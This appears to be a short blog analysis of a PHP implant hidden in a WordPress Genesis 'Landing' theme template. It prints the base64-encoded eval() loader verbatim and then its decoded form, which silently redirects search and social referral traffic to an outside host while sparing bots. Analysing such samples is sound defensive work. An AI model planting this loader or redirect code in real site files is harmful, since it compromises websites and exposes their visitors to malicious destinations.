An analysis of a PHP implant I came across on VirusTotal Intelligence.
<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9pYm9udHUuMjV1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9")); /** * This file adds the Landing template to the Agency Theme. * * @author StudioPress * @package Agency * @subpackage Customizations */ /* Template Name: Landing */ // Add custom body class to the head add_filter( 'body_class', 'add_body_class' ); function add_body_class( $classes ) { $classes[] = 'agency-landing'; return $classes; } // Remove header, navigation, breadcrumbs, footer widgets, footer add_filter( 'genesis_pre_get_option_site_layout', '__genesis_return_full_width_content' ); remove_action( 'genesis_header', 'genesis_header_markup_open', 5 ); remove_action( 'genesis_header', 'genesis_do_header' ); remove_action( 'genesis_header', 'genesis_header_markup_close', 15 ); remove_action( 'genesis_after_header', 'genesis_do_nav' ); remove_action( 'genesis_after_header', 'genesis_do_subnav' ); remove_action( 'genesis_before_content_sidebar_wrap', 'genesis_do_breadcrumbs'); remove_action( 'genesis_before_footer', 'genesis_footer_widget_areas' ); remove_action( 'genesis_footer', 'genesis_footer_markup_open', 5 ); remove_action( 'genesis_footer', 'genesis_do_footer' ); remove_action( 'genesis_footer', 'genesis_footer_markup_close', 15 ); genesis();
On an initial investigation of the file, it is pretty obvious there is something funky going on. Spot the eval()
right at the beginning of the code…
The decoded eval
looks like this:
<?php error_reporting(0); $qazplm = headers_sent(); if (!$qazplm) { $referer = $_SERVER['HTTP_REFERER']; $uag = $_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag, "MSIE 7.0") and !stristr($uag, "MSIE 6.0")) { if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler") or stristr($referer, "live.com") or stristr($referer, "webalta") or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer) or preg_match("/google\.(.*?)\/url\?sa/", $referer) or stristr($referer, "myspace.com") or stristr($referer, "facebook.com/l") or stristr($referer, "aol.com")) { if (!stristr($referer, "cache") or !stristr($referer, "inurl")) { header("Location: http://ibontu.25u.com/"); exit(); } } } } }
A quick glance over the script shows it is a ‘redirector’, which has the intention to redirect traffic to an alternative location, in this case: header("Location: http://ibontu.25u.com/");
The script also deflects requests from bots, to prevent the bots from being redirected to the alternative site.
Crude, but effective – somewhat :/
References
VirusTotal
Obfuscated - https://www.virustotal.com/en/file/dbc1bf2de89ee7dd2597697b315be084ccf86edefd9f7e2dbf430438871a3fee/analysis/
DeObfuscated - https://www.virustotal.com/en/file/66899269383bd479b0e29a5136e496bbd8d068daf514909bf7b2f30174dac0b9/analysis